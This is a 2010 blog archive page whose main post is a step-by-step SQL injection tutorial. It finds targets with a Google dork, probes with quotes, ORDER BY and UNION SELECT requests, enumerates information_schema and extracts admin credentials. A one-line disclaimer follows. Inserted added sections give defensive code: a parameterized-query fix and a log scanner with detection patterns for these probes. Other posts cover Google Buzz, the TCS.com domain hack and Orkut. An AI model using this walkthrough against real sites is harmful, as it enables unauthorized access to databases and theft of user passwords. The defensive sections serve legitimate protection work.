Archive for February, 2010

How to perform a SQL injection?

February 18, 2010 5 comments

First of all we must know what a ‘SQL injection’ is. Here is the Wikipedia definition: ‘SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application’. Here we will confine ourselves to SQL injections in web sites.

Now we need a site link that is likely to be vulnerable; most probably it will be of the form ‘http://www.site.com/abc.php?id=5’. If you haven’t got such a link, just do a search in Google for ‘allinurl:.php?*id’ and pick a result.

1. Check for the vulnerability by adding a single quote (') to the above link.

If you get an error message it means that the site is vulnerable to SQL injection.

Now you can be damn sure that the site is vulnerable to SQL injection.

2. Find out the number of columns

To find the number of columns we use the ORDER BY clause.

Just increment the number until we get an error.

http://www.site.com/abc.php?id=5 order by 1-- <-- no error

http://www.site.com/abc.php?id=5 order by 2-- <-- no error

http://www.site.com/abc.php?id=5 order by 3-- <-- no error

http://www.site.com/abc.php?id=5 order by 4-- <-- ERROR (we get some message like Unknown column '4')

So we can conclude that the table has 4 columns

3. Check whether UNION function works or not

http://www.site.com/abc.php?id=5 union all select 1,2,3--

We will get a number on the screen. Let’s say we get the number 2 at this step.

4. Check for MySQL version by replacing 2 in the above step by version()

http://www.site.com/abc.php?id=5 union all select 1,version(),3--

Now you can read the version from the page, and only if it is found to be above 5 can we continue to the next steps.

// If the version is lower than 5, then we will have to adopt some other methods, which I will explain in a future post //

5. Use information_schema

Why do we use information_schema? The reason is very simple: ‘In MySQL 5 and higher versions, information_schema holds all tables and columns in the database’.

To get tables we use table_name and information_schema.tables

http://www.site.com/abc.php?id=5 union all select 1,table_name,3 from information_schema.tables--

6. Now that we have the column and table names, just retrieve the sensitive data like admin, user, passwords, etc.
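The root cause behind the steps above and its fix, as an added example that is not part of the original post: the id parameter is concatenated into the SQL text, which is why a stray quote or an out-of-range ORDER BY surfaces as a database error. The articles table, the function names and the use of SQLite in place of MySQL are assumptions made for illustration.

```python
import re
import sqlite3

QUERY = "SELECT id, title, body FROM articles WHERE id = "

def make_db():
    # Constructed sample data; SQLite stands in for the page's MySQL back end.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("INSERT INTO articles VALUES (5, 'Hello', 'First post')")
    return conn

def lookup_vulnerable(conn, raw_id):
    # The flaw: the request parameter becomes part of the SQL text, so any
    # SQL syntax inside it is parsed as part of the statement.
    return conn.execute(QUERY + raw_id).fetchall()

def lookup_safe(conn, raw_id):
    # Accept only what an id can be, before the database is involved.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a decimal integer")
    # Bind the value as a parameter: the SQL text is constant and the
    # input is only ever compared against the id column.
    return conn.execute(QUERY + "?", (int(raw_id),)).fetchall()

def outcome(lookup, raw_id):
    """What a client would observe for one request to abc.php?id=<raw_id>."""
    conn = make_db()
    try:
        rows = lookup(conn, raw_id)
    except sqlite3.Error:
        return "db-error"    # the signal steps 1 and 2 depend on
    except ValueError:
        return "rejected"    # answer 400 with a generic page, log the input
    finally:
        conn.close()
    return f"{len(rows)} row(s)"

# Inputs taken from the steps above.
PROBES = ["5", "5'", "5 order by 3--", "5 order by 4--", "5 union all select 1,2,3--"]

if __name__ == "__main__":
    for probe in PROBES:
        print(f"{probe!r:32} vulnerable={outcome(lookup_vulnerable, probe):10} "
              f"safe={outcome(lookup_safe, probe)}")
```

With the bound parameter and the integer check in place, every input other than a plain number is refused before a query runs, so no database error or extra row ever reaches the client.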

//PLEASE DON’T USE THE INFORMATION PROVIDED IN THIS POST FOR CRACKING PURPOSES
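For defenders, the requests in steps 1 to 5 leave a recognisable trail in web server logs. The following added example (not from the original post) flags them in access-log lines; the log lines, IP addresses and rule names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = """\
192.0.2.10 - - [18/Feb/2010:10:00:00 +0000] "GET /abc.php?id=5 HTTP/1.1" 200 5120
198.51.100.7 - - [18/Feb/2010:10:01:02 +0000] "GET /abc.php?id=5%27 HTTP/1.1" 500 310
198.51.100.7 - - [18/Feb/2010:10:01:09 +0000] "GET /abc.php?id=5+order+by+1-- HTTP/1.1" 200 5120
198.51.100.7 - - [18/Feb/2010:10:01:15 +0000] "GET /abc.php?id=5+order+by+4-- HTTP/1.1" 500 310
198.51.100.7 - - [18/Feb/2010:10:01:30 +0000] "GET /abc.php?id=5%20UNION%20ALL%20SELECT%201,version(),3-- HTTP/1.1" 200 5140
198.51.100.7 - - [18/Feb/2010:10:01:44 +0000] "GET /abc.php?id=5+union+all+select+1,table_name,3+from+information_schema.tables-- HTTP/1.1" 200 9800
192.0.2.10 - - [18/Feb/2010:10:02:00 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# One rule per probe in the walkthrough, applied to decoded parameter values.
RULES = [
    ("quote-probe", re.compile(r"^\d+\s*'$")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("version-probe", re.compile(r"\bversion\s*\(", re.I)),
    ("schema-enum", re.compile(r"\binformation_schema\b", re.I)),
]

def scan(log_text):
    """Return {client_ip: {"rules": [...], "errors": n}} for flagged clients."""
    hits = defaultdict(lambda: {"rules": set(), "errors": 0})
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        # parse_qsl percent-decodes and turns '+' into a space, so encoded
        # and plain variants of the same probe match the same rule.
        values = [v for _, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
        matched = {name for name, rx in RULES for v in values if rx.search(v)}
        if matched:
            hits[ip]["rules"] |= matched
            hits[ip]["errors"] += status.startswith("5")  # flagged request that errored
    return {ip: {"rules": sorted(h["rules"]), "errors": h["errors"]}
            for ip, h in hits.items()}

if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG).items():
        print(ip, info)
```

A client that trips several rules in a short window, with server errors mixed in, matches the walkthrough far more closely than a single keyword hit such as the benign search request in the sample.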

Categories: Hack

How to turn off Buzz in Gmail?

February 11, 2010 3 comments

Everyone has just started using Google Buzz, and many have yet to make sense of it. Still, the WebMonkey wants to tell you how to turn OFF Google Buzz. So if you haven’t liked the BUZZZZZes in Gmail, just follow the steps given below.
1. Log in to Gmail
2. Scroll down to the bottom of the page
3. Click the ‘Turn off Buzz’ link

Turning off Google Buzz

Now what if you want Google Buzz back? Just click the ‘Turn on Buzz’ link at the bottom.

Categories: Google, Social Networking

TCS.com hack exposes difference between Google Public DNS and OpenDNS services

February 7, 2010 8 comments

TCS.com, belonging to Tata Consultancy Services, was hacked earlier today, and it is claimed to be an attack over a DNS loophole.

Using nslookup, the difference between Google Public DNS and OpenDNS was studied.

On using nslookup with OpenDNS, the results for tcs.com and www.tcs.com were the same.

nslookup for tcs.com and www.tcs.com in OpenDNS

On using nslookup with Google Public DNS, the results for tcs.com and www.tcs.com were different.

For www.tcs.com the address was 205.178.152.154, while for tcs.com it was 216.15.200.140.
nslookup for www.tcs.com and tcs.com in Google Public DNS

Thanks to Albins for pointing out the difference.

Categories: Hack

Official site of Tata Consultancy Services gets hacked by a French cracker

February 7, 2010 3 comments

The website http://www.tcs.com, which belongs to India’s IT giant Tata Consultancy Services, has been hacked by a French hacker. As I write this post, the TCS group has still not resolved the problem. It’s more likely that it is not a web software hack, but an attack through a DNS loophole.
If you visit TCS.com you will see a page like the screenshot below, saying that they have put up the domain name for sale.
TCS hacked: puts up the domain name for sale

Categories: Hack

People Hopper : Morphing Application in Orkut

February 6, 2010

On February 4th, 2010, Orkut launched a new app called ‘People Hopper’. It lets you take your profile image and “morph” it into your friend’s photo.

Given two images, it hops across millions of public images in Orkut so that one image is smoothly transformed into another. No computer graphics tricks are used and every image along the transition comes from real Orkut users.

Try People Hopper here

For more information visit Orkut blog

Categories: Social Networking